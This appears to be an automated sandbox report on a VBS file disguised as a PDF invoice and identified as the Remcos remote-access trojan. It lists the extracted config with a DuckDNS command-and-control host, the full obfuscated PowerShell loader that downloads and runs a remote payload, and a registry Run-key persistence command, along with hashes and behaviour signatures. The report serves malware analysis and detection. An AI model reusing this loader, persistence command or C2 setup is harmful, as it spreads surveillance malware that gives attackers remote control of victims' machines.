Overview

overview

10

Static

static

1

INV_642421...df.vbs

windows7-x64

10

INV_642421...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 09:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    INV_642421346_50136253995_SIMPLE_SK·pdf.vbs

  • Size

    33KB

  • MD5

    5c4cdb5cdd819889856451945d0e3421

  • SHA1

    90ee3b5a6ae37568bf0e8cb5769c602a851ae45a

  • SHA256

    eaaeb54bc1f3cd1f7f3b6a26b608ce60e226ae8f54d0626187c6fc42562e3d67

  • SHA512

    fd62004cd1a591cf9b1aa0ad581bad976a7f75881c025cc5e4b674d45d543104c25f8cbb853cd772e5cbbcf85873a682b64be4eae6c532921e5bfa275405af44

  • SSDEEP

    768:xFeasDMIvJVT92xONnuJOK48hZVAe/NOVVg5+rS9JL7ZZ:Heas/JuAoj5/L0S5+e9J7z

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INV_642421346_50136253995_SIMPLE_SK·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Coffeylene219='Rabbinistic';;$Micromesentery='Teskere';;$Amphidisk='Ubesrgelig';;$Clerkliest='Cabinets';;$Mucopolysaccharide=$host.Name;function Forepale($Aminoaciduria){If ($Mucopolysaccharide) {$Bugserende=4} for ($Coffey=$Bugserende;;$Coffey+=5){if(!$Aminoaciduria[$Coffey]) { break };$Edderfugls+=$Aminoaciduria[$Coffey];$Salted='Wibroe'}$Edderfugls}function Guardhouse($Uforstilt){ .($Andenhaandsvidens) ($Uforstilt)}$Bulnende221=Forepale ' angn Cr.eInduTRau..TrusW';$Bulnende221+=Forepale 'Pi neSamlBLsniCPrerLE uliIndpE monn Undt';$lgeattesten=Forepale 'kaurMSammoP cuzMe aiRepulEnsel ondaf,ll/';$Dephlegm=Forepale 'Kon TneurlPants aad1Stud2';$Diddlers='porp[N bbnCeleeEst t Mon.GanaSb eceOpmur SmevForsi NonCHjemEToo,PArgeO UneiSk,hNAfsvtFr em iocaTilhN UloaPancgd.agERegir Pol]Repe:Po e:Ac osVvr E EnkCHalvUSgneRimpaiu.neT PseyN nopTetrr Esto PhoTM rpo P,oc iddoNatilImmi= ,nr$ SwaDMikrE Et.pSkodH LanLP,aceJordGDansm';$lgeattesten+=Forepale 'Ku k5Fres.Thec0Abri Bowe(AntiW Choi undnKirkdDosmoSkolwStotsMell ReasNDybdT Pem Skov1 bed0 tvi.Lur 0B,av;Unpl LnesW,reviStilnAns 6paci4 Pro; Ve. StaxAvis6Godt4Atox;Opko FlisrFancv plu:Cu m1 Enf3Riss1 St .Des.0Skum)men UnimG HimeFlexc aadkNedsot,rm/Tric2 ass0Klo 1 er0,ell0 nom1Hoc 0 Ov 1Ordr AttrFU soi VogrBesheOptlfsensoHapaxUnru/ eto1 App3Mi i1 Sut.Urne0';$Ddsstraffe188=Forepale 'Ca dU ,laS Ho eMusarUnas-Her A ngeGDublEPea.NHo,ot';$Podarthral=Forepale 'Kos hVaretDuctt akpStersOsci: V.j/Reno/Idyld A.orCalui D.kvS maeCauc.Unv gSlkkoTafloTamggHo el Tr eLola.BillcMoneo PotmStej/ Micu SkacSkaf?Barye SacxS.agpDri oChlorUheltSpec=PobbdTomao T rwGrenn Bi lNondo B,eaH thdSeri&Parai aladRest=Vves1Longs O yXReuso icrJRygd8 Tidk r aaBaby8IoniO RepPRefrdUn v4 U mHTra,5RimfJCo.yLSponA ZeszL kt-BlafCConsl EntbIndbH bes7 Supn U r8fert3retrcPathgosmaTfi,kgFrdiK';$Tidsalders=Forepale 'Buck>';$Andenhaandsvidens=Forepale ' deti croEQueeX';$Helnode='congolese';$Nyskabes='\Liparomphalus.Reg';Guardhouse (Forepale 'En e$MotoG limlNi iOGodkBScalaUntrLMarg:Gaars LunpJubiaSaddtTsarH AfsYNemee nmMTenuaBeau=Sten$S,lue SufnHungvTatl:ClauaFun Pmis.P S.gDLatiaRr rTCoobAFo s+Ydmy$DagsNdrivY KomS NecKBeglAVimfbCircePoess');Guardhouse (Forepale ' .ps$CrabgExcuL.oldo.onmb eurAVisilConv:glumkW edAAshiRJaegAQ izmSprlBreacOPerelP olA A rGDormE S.jNMa eSHver2Assu3 Sem5Torn= rbe$.ctiP DodOChe.dEgreaTaberNonrt BehHTrinRPopuALuguLForr.LeessDavip aslLf liiRefoTUn a(A go$ FesT.ateiR.ladN nas .neaP opL efdPicreLse,RSyvas.yna)');Guardhouse (Forepale $Diddlers);$Podarthral=$Karambolagens235[0];$Aftnende=(Forepale 'Subj$ spiGCdmbl.areOD noBVandaP rclHusb:ReenMSwizuUmptl Ap T E.tiIn,eLTffeAUdpoYIndhE Fi r.rhe=trihNMaj.eSna W Tv -S.rioTramB FraJBinoeDun CCommTSide TystSMellYNonpSJokuT.vanEFngsmPard.s ov$.araBLse UCe tLN.nanO,erezyzzn MicdImmiEOval2be.g2Mini1');Guardhouse ($Aftnende);Guardhouse (Forepale 'Aris$SammMStenu ShelC ictGr.siI itl MinauntayMetaeIndtr S.i. xtrHSchneDansaProcdUnmeeOsm rP.ezsHood[Sydf$SulfDtingdR imsR gisRosatJourrQueeaArmofUrlafIndie Ur.1Komi8Pand8 nl]Cap,=Freg$ ontl StegKnaceFungaCirctUnaptDaadeTilssjeoptDuskeRe sn');$Unfoilable=Forepale 'P,ly$For.Mnat uIrralAnbetAutoi harlsal,aS ityDi jeMatarPree.Ve kDKnivoJvnfw,ocknClotlBystoHulkaRivudSno,FT mbilgnil F,ee Uni( lka$Eq iPKlago LocdDelia Attr Strt R th D.arPrecaSupelTuri,F.rd$ KnoT SkiasammnK ektDy.aa Gesl RadiP.ltzRee.iJohanKarygSnobnPri.e rilsUdspsPend)';$Tantalizingness=$Spathyema;Guardhouse (Forepale 'Flum$SkarGcondlCir,O R dbAnv a RetLO er: eakvSalaRNatilSyltE Smin oardVen.ERygrSSour= Pin(V,riT DroEGlamSDe,utClos-Agg.PPnsea ootMandh Dag Sniv$Sug TS iva M,dn ElhtSto a TimLUdstIScriZTykti TroN tylG Z mNSofieKvals.ddasfl s)');while (!$Vrlendes) {Guardhouse (Forepale 'Ydel$unaugU.pflAr eoPrecbEn gaDdsdlFrue:BeskaSilinSus nC uta evebChaneDrifl pei=Hol $PlybDHosta DuscOvert namyYa nl') ;Guardhouse $Unfoilable;Guardhouse (Forepale 'RaasSIronTPragaKameR ulsTPort- ummSMindLHemaEVa,oEAmphPSila Di.e4');Guardhouse (Forepale ' Fa $KberGBeraLPos ODru.BErota inslIndv:Forev fter TitLWhiseK rnNSjofDHoveE UdsSV gg=Puni(VaabT TryEUnivSVariT and-PretPCassaHolotMe,ch Man Goo$Tromt TamaSensnUnprT Liga RapL BlaISvedZSubpi ,tynAut.gBramN An ELumbSVa is Nos)') ;Guardhouse (Forepale 'e,an$Thigg eriLCol.OLev,BYoruaFiltlNone: VeikTorsEBrair M.lcTitbH RooU EosNBankKExul=Rags$Ap,pGSlutlT opO,hilbIncaal dilThyr:GenbbRdseoGru WMiniDdegal KonEre cRG.ypi FllZMultaA.glTMiliIMetaOImpeN ar sTrua+Gise+Cran%Tapi$ PatKaminA ilkR ampa.ausmBolsbOutbOlittL Yv AK rtgUnsuEOastnN.poSP iv2Ungi3Hind5Llen. ComCTri OFemtuUndenTandt') ;$Podarthral=$Karambolagens235[$Kerchunk]}$Lgeerklringer=284242;$Rhyparography=31619;Guardhouse (Forepale ' Skr$UdloGPlutLDifbOKonsBGazuarecoLSpyd:NedidTra,YPrerN isA OutS uppTSchoiA fdEBeboR KatNRittECanaSBota1Brug9Jig,7Stab Ra d=An i Su,sGVikaEBespT Ata-Vas CT eroAgomn,ociTAeg,ESubcNMumitUnbr Ary$HenstP leAdownn HazTBuggA nselGu ai mniz.prrIJan n Ga,GsagsnEscoeParaSNonss');Guardhouse (Forepale 'Deci$ SergCelll,orloMonrbForsa.astlRepa: S.nD anr.eflvO,ereBeresMarg1Rub 6Traf5A,ne Tra.= Cot vak[Dri S R.gyMlkesSucctPou,eSpelmDidr.OlieCMangoUntinEpi.vEng eBoflrSemitAr e]Reci:Advi:flosFD urrT.nko StrmliveBTet,a F ms PoleClob6Post4Ga aSForptFurarRensiCeden LepgTalm( oud$OverDin.ey DemnFettaUnensPalatGle.i Bi eFolkrFl tnSk.leAntasSa k1Peam9 He 7 eff)');Guardhouse (Forepale 'Repe$EntrgFjerlArtioScapbsystAfortLP ei:LindskosmtHrderClonR pro Kkke= tis Lor.[Bis S ImbyKnausS.ektDybee DodmAmei.EvertgodkEOpgaxDifftSpol.A apeTaveNstyrC Ur o LukdUndeiRgernSpregNonf]Vejb:Nost:RingaSe eSPrimCforbi LerIGive.Ver g angEAndetInteSSta tOphiRflasI,eron So,gDeli( Co $CoapdCokeRFinavFljmePligs ro1 E d6 Ful5Defu)');Guardhouse (Forepale 'Retr$ St GP anlGlosOUg eB BveAUd.alHigh: Muta TidnForkiGlo,ECeletRdeh=Hygg$Nonas,eglTbushR hylr Sp . SlesHistUM,sebparasE.ghtSwanRRefuiOvernKalkG uta(Fav,$PoeslSubcGcr zE SapEkod RZ chkForsLBaneRaneriO alnMuregCondetrirrSn i, ebe$AbraR SubhTaury,eroPMicrAIrreR binoEquiGBearrNon ATun,pNeutHLdreYF em)');Guardhouse $Aniet;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Coffeylene219='Rabbinistic';;$Micromesentery='Teskere';;$Amphidisk='Ubesrgelig';;$Clerkliest='Cabinets';;$Mucopolysaccharide=$host.Name;function Forepale($Aminoaciduria){If ($Mucopolysaccharide) {$Bugserende=4} for ($Coffey=$Bugserende;;$Coffey+=5){if(!$Aminoaciduria[$Coffey]) { break };$Edderfugls+=$Aminoaciduria[$Coffey];$Salted='Wibroe'}$Edderfugls}function Guardhouse($Uforstilt){ .($Andenhaandsvidens) ($Uforstilt)}$Bulnende221=Forepale ' angn Cr.eInduTRau..TrusW';$Bulnende221+=Forepale 'Pi neSamlBLsniCPrerLE uliIndpE monn Undt';$lgeattesten=Forepale 'kaurMSammoP cuzMe aiRepulEnsel ondaf,ll/';$Dephlegm=Forepale 'Kon TneurlPants aad1Stud2';$Diddlers='porp[N bbnCeleeEst t Mon.GanaSb eceOpmur SmevForsi NonCHjemEToo,PArgeO UneiSk,hNAfsvtFr em iocaTilhN UloaPancgd.agERegir Pol]Repe:Po e:Ac osVvr E EnkCHalvUSgneRimpaiu.neT PseyN nopTetrr Esto PhoTM rpo P,oc iddoNatilImmi= ,nr$ SwaDMikrE Et.pSkodH LanLP,aceJordGDansm';$lgeattesten+=Forepale 'Ku k5Fres.Thec0Abri Bowe(AntiW Choi undnKirkdDosmoSkolwStotsMell ReasNDybdT Pem Skov1 bed0 tvi.Lur 0B,av;Unpl LnesW,reviStilnAns 6paci4 Pro; Ve. StaxAvis6Godt4Atox;Opko FlisrFancv plu:Cu m1 Enf3Riss1 St .Des.0Skum)men UnimG HimeFlexc aadkNedsot,rm/Tric2 ass0Klo 1 er0,ell0 nom1Hoc 0 Ov 1Ordr AttrFU soi VogrBesheOptlfsensoHapaxUnru/ eto1 App3Mi i1 Sut.Urne0';$Ddsstraffe188=Forepale 'Ca dU ,laS Ho eMusarUnas-Her A ngeGDublEPea.NHo,ot';$Podarthral=Forepale 'Kos hVaretDuctt akpStersOsci: V.j/Reno/Idyld A.orCalui D.kvS maeCauc.Unv gSlkkoTafloTamggHo el Tr eLola.BillcMoneo PotmStej/ Micu SkacSkaf?Barye SacxS.agpDri oChlorUheltSpec=PobbdTomao T rwGrenn Bi lNondo B,eaH thdSeri&Parai aladRest=Vves1Longs O yXReuso icrJRygd8 Tidk r aaBaby8IoniO RepPRefrdUn v4 U mHTra,5RimfJCo.yLSponA ZeszL kt-BlafCConsl EntbIndbH bes7 Supn U r8fert3retrcPathgosmaTfi,kgFrdiK';$Tidsalders=Forepale 'Buck>';$Andenhaandsvidens=Forepale ' deti croEQueeX';$Helnode='congolese';$Nyskabes='\Liparomphalus.Reg';Guardhouse (Forepale 'En e$MotoG limlNi iOGodkBScalaUntrLMarg:Gaars LunpJubiaSaddtTsarH AfsYNemee nmMTenuaBeau=Sten$S,lue SufnHungvTatl:ClauaFun Pmis.P S.gDLatiaRr rTCoobAFo s+Ydmy$DagsNdrivY KomS NecKBeglAVimfbCircePoess');Guardhouse (Forepale ' .ps$CrabgExcuL.oldo.onmb eurAVisilConv:glumkW edAAshiRJaegAQ izmSprlBreacOPerelP olA A rGDormE S.jNMa eSHver2Assu3 Sem5Torn= rbe$.ctiP DodOChe.dEgreaTaberNonrt BehHTrinRPopuALuguLForr.LeessDavip aslLf liiRefoTUn a(A go$ FesT.ateiR.ladN nas .neaP opL efdPicreLse,RSyvas.yna)');Guardhouse (Forepale $Diddlers);$Podarthral=$Karambolagens235[0];$Aftnende=(Forepale 'Subj$ spiGCdmbl.areOD noBVandaP rclHusb:ReenMSwizuUmptl Ap T E.tiIn,eLTffeAUdpoYIndhE Fi r.rhe=trihNMaj.eSna W Tv -S.rioTramB FraJBinoeDun CCommTSide TystSMellYNonpSJokuT.vanEFngsmPard.s ov$.araBLse UCe tLN.nanO,erezyzzn MicdImmiEOval2be.g2Mini1');Guardhouse ($Aftnende);Guardhouse (Forepale 'Aris$SammMStenu ShelC ictGr.siI itl MinauntayMetaeIndtr S.i. xtrHSchneDansaProcdUnmeeOsm rP.ezsHood[Sydf$SulfDtingdR imsR gisRosatJourrQueeaArmofUrlafIndie Ur.1Komi8Pand8 nl]Cap,=Freg$ ontl StegKnaceFungaCirctUnaptDaadeTilssjeoptDuskeRe sn');$Unfoilable=Forepale 'P,ly$For.Mnat uIrralAnbetAutoi harlsal,aS ityDi jeMatarPree.Ve kDKnivoJvnfw,ocknClotlBystoHulkaRivudSno,FT mbilgnil F,ee Uni( lka$Eq iPKlago LocdDelia Attr Strt R th D.arPrecaSupelTuri,F.rd$ KnoT SkiasammnK ektDy.aa Gesl RadiP.ltzRee.iJohanKarygSnobnPri.e rilsUdspsPend)';$Tantalizingness=$Spathyema;Guardhouse (Forepale 'Flum$SkarGcondlCir,O R dbAnv a RetLO er: eakvSalaRNatilSyltE Smin oardVen.ERygrSSour= Pin(V,riT DroEGlamSDe,utClos-Agg.PPnsea ootMandh Dag Sniv$Sug TS iva M,dn ElhtSto a TimLUdstIScriZTykti TroN tylG Z mNSofieKvals.ddasfl s)');while (!$Vrlendes) {Guardhouse (Forepale 'Ydel$unaugU.pflAr eoPrecbEn gaDdsdlFrue:BeskaSilinSus nC uta evebChaneDrifl pei=Hol $PlybDHosta DuscOvert namyYa nl') ;Guardhouse $Unfoilable;Guardhouse (Forepale 'RaasSIronTPragaKameR ulsTPort- ummSMindLHemaEVa,oEAmphPSila Di.e4');Guardhouse (Forepale ' Fa $KberGBeraLPos ODru.BErota inslIndv:Forev fter TitLWhiseK rnNSjofDHoveE UdsSV gg=Puni(VaabT TryEUnivSVariT and-PretPCassaHolotMe,ch Man Goo$Tromt TamaSensnUnprT Liga RapL BlaISvedZSubpi ,tynAut.gBramN An ELumbSVa is Nos)') ;Guardhouse (Forepale 'e,an$Thigg eriLCol.OLev,BYoruaFiltlNone: VeikTorsEBrair M.lcTitbH RooU EosNBankKExul=Rags$Ap,pGSlutlT opO,hilbIncaal dilThyr:GenbbRdseoGru WMiniDdegal KonEre cRG.ypi FllZMultaA.glTMiliIMetaOImpeN ar sTrua+Gise+Cran%Tapi$ PatKaminA ilkR ampa.ausmBolsbOutbOlittL Yv AK rtgUnsuEOastnN.poSP iv2Ungi3Hind5Llen. ComCTri OFemtuUndenTandt') ;$Podarthral=$Karambolagens235[$Kerchunk]}$Lgeerklringer=284242;$Rhyparography=31619;Guardhouse (Forepale ' Skr$UdloGPlutLDifbOKonsBGazuarecoLSpyd:NedidTra,YPrerN isA OutS uppTSchoiA fdEBeboR KatNRittECanaSBota1Brug9Jig,7Stab Ra d=An i Su,sGVikaEBespT Ata-Vas CT eroAgomn,ociTAeg,ESubcNMumitUnbr Ary$HenstP leAdownn HazTBuggA nselGu ai mniz.prrIJan n Ga,GsagsnEscoeParaSNonss');Guardhouse (Forepale 'Deci$ SergCelll,orloMonrbForsa.astlRepa: S.nD anr.eflvO,ereBeresMarg1Rub 6Traf5A,ne Tra.= Cot vak[Dri S R.gyMlkesSucctPou,eSpelmDidr.OlieCMangoUntinEpi.vEng eBoflrSemitAr e]Reci:Advi:flosFD urrT.nko StrmliveBTet,a F ms PoleClob6Post4Ga aSForptFurarRensiCeden LepgTalm( oud$OverDin.ey DemnFettaUnensPalatGle.i Bi eFolkrFl tnSk.leAntasSa k1Peam9 He 7 eff)');Guardhouse (Forepale 'Repe$EntrgFjerlArtioScapbsystAfortLP ei:LindskosmtHrderClonR pro Kkke= tis Lor.[Bis S ImbyKnausS.ektDybee DodmAmei.EvertgodkEOpgaxDifftSpol.A apeTaveNstyrC Ur o LukdUndeiRgernSpregNonf]Vejb:Nost:RingaSe eSPrimCforbi LerIGive.Ver g angEAndetInteSSta tOphiRflasI,eron So,gDeli( Co $CoapdCokeRFinavFljmePligs ro1 E d6 Ful5Defu)');Guardhouse (Forepale 'Retr$ St GP anlGlosOUg eB BveAUd.alHigh: Muta TidnForkiGlo,ECeletRdeh=Hygg$Nonas,eglTbushR hylr Sp . SlesHistUM,sebparasE.ghtSwanRRefuiOvernKalkG uta(Fav,$PoeslSubcGcr zE SapEkod RZ chkForsLBaneRaneriO alnMuregCondetrirrSn i, ebe$AbraR SubhTaury,eroPMicrAIrreR binoEquiGBearrNon ATun,pNeutHLdreYF em)');Guardhouse $Aniet;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jagtdeltagernes% -windowstyle 1 $Thermopsis=(gp -Path 'HKCU:\Software\Kowtowing\').blomsterkummerne;%Jagtdeltagernes% ($Thermopsis)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jagtdeltagernes% -windowstyle 1 $Thermopsis=(gp -Path 'HKCU:\Software\Kowtowing\').blomsterkummerne;%Jagtdeltagernes% ($Thermopsis)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1808

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    6da2bd9f8aa488cf2ec3217309a35e3b

    SHA1

    41073a4b98eaabb9d949b4b390fe250c063b4866

    SHA256

    c0e562982644a6d65599a9bbf6b0856ad9f73d50daa18b553a2bd6b5fdff353b

    SHA512

    64c09fd35922b5451534ace3abe047be37cdb385db40ff590b01fc947368b61aeebca04860b0859f745b115f64cf49c65711a581e50dcaa2ff1203d427d122f8

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabB33B.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar2FA9.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Liparomphalus.Reg
    Filesize

    411KB

    MD5

    d0e36e0d60f77c685edaed2abb7cd1a6

    SHA1

    007c81faed2a21cc78d474f0c00d43695c77d479

    SHA256

    b40bbf545853f3a47d267307d3ce8c2981914ebe36105af352cdb2a61ee25951

    SHA512

    7c137b945b818cc70a9d4848b49c64ba2319383d8e3b5dfd085adc1d0e8a1fa9c5116b0bae089cae9afda35c5bad542b7c5d74dc71361dbeb1dffd8266775692

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KM8245OMHHG2J91IW951.temp
    Filesize

    7KB

    MD5

    e9b1baaf17d141ad1aebd430b7f03c0c

    SHA1

    f27cbbdb979a86d3ef1660b94d22a0c019001e32

    SHA256

    5a7b237dd330918eac5c302ea3a530803ca507b5941a209a9c860e4d0ec97856

    SHA512

    0c4ba4f0cc9693b70127f47c8150f95766d7a37178eb0973b9dab24122785f3ad80240bb3ce84e970c01880912dc407b7f472dafa173b5a24d7c64b4f4b4718f

    Download Submit

  • memory/1908-62-0x0000000000CA0000-0x0000000001D02000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1908-61-0x0000000000CA0000-0x0000000001D02000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2612-38-0x0000000006650000-0x00000000089EB000-memory.dmp

    Filesize

    35.6MB

    Download

  • memory/3016-25-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-29-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3016-30-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-31-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-32-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-34-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-26-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-27-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-24-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-21-0x000000001B660000-0x000000001B942000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3016-22-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3016-23-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3016-20-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

    Filesize

    4KB

    Download